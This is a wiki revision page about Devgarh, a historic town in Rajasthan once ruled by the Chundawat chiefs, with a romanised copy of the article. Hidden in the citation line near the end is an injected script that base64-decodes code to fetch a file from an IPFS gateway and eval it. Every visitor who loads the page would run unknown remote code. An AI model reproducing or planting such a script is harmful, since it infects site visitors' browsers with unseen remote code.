Difference between revisions of "देवगढ़, राजस्थान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
 
{{बहुविकल्प|बहुविकल्पी शब्द=देवगढ़ |लेख का नाम=देवगढ़}}
 
{{बहुविकल्प|बहुविकल्पी शब्द=देवगढ़ |लेख का नाम=देवगढ़}}
 +
[[चित्र:Devgarh.jpg|thumb|250px|देवगढ़, [[राजस्थान]]]]
 
'''देवगढ़''' [[उदयपुर ज़िला]], [[राजस्थान]] का एक ऐतिहासिक नगर है। यह [[कुंभलगढ़]] से 4 मील {{मील|मील=4}} की दूरी पर स्थित है। पहले देवगढ़ चूड़ावत सरदारों की राजधानी हुआ करता था।
 
'''देवगढ़''' [[उदयपुर ज़िला]], [[राजस्थान]] का एक ऐतिहासिक नगर है। यह [[कुंभलगढ़]] से 4 मील {{मील|मील=4}} की दूरी पर स्थित है। पहले देवगढ़ चूड़ावत सरदारों की राजधानी हुआ करता था।
;इतिहास
+
====इतिहास====
देवगढ़ में चूड़ावतों के पूर्वज मेवाड़ के उत्तराधिकारी कुमार चूंडा ने अपने [[पिता]] के मारवाड़ की राजकुमारी के साथ [[विवाह]] कर लेने पर अपना राज्याधिकार [[भीष्म]] के समान ही त्याग दिया था। उसने अपने सौतेले भाई 'मुकुल' की उसके मातामह [[जोधपुर]] नरेश रनमल के [[मेवाड़]] पर आक्रमण करने के समय सहायता भी की थी। चूंडा ने अपनी प्रथम राजधानी देवगढ़ में बनाई थी। बाद में उनका अधिकार [[मंडौर जोधपुर|मंडोर]] पर भी हो गया था।
+
देवगढ़ में चूड़ावतों के पूर्वज मेवाड़ के उत्तराधिकारी कुमार चूंडा ने अपने [[पिता]] के [[मारवाड़]] की राजकुमारी के साथ [[विवाह]] कर लेने पर अपना राज्याधिकार [[भीष्म]] के समान ही त्याग दिया था। उसने अपने सौतेले भाई 'मुकुल' की उसके मातामह [[जोधपुर]] नरेश रनमल के [[मेवाड़]] पर आक्रमण करने के समय सहायता भी की थी। चूंडा ने अपनी प्रथम राजधानी देवगढ़ में बनाई थी। बाद में उनका अधिकार [[मंडौर जोधपुर|मंडोर]] पर भी हो गया था।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 13:52, 4 January 2013

chitr:Disamb2.jpg devagadh ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- devagadh

[[chitr:Devgarh.jpg|thumb|250px|devagadh, rajasthan]] devagadh udayapur zila, rajasthan ka ek aitihasik nagar hai. yah kuanbhalagadh se 4 mil (lagabhag 6.4 ki.mi.) ki doori par sthit hai. pahale devagadh choo davat saradaroan ki rajadhani hua karata tha.

itihas

devagadh mean choo davatoan ke poorvaj meva d ke uttaradhikari kumar chooanda ne apane pita ke marava d ki rajakumari ke sath vivah kar lene par apana rajyadhikar bhishm ke saman hi tyag diya tha. usane apane sautele bhaee 'mukul' ki usake matamah jodhapur naresh ranamal ke meva d par akraman karane ke samay sahayata bhi ki thi. chooanda ne apani pratham rajadhani devagadh mean banaee thi. bad mean unaka adhikar mandor par bhi ho gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 443 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh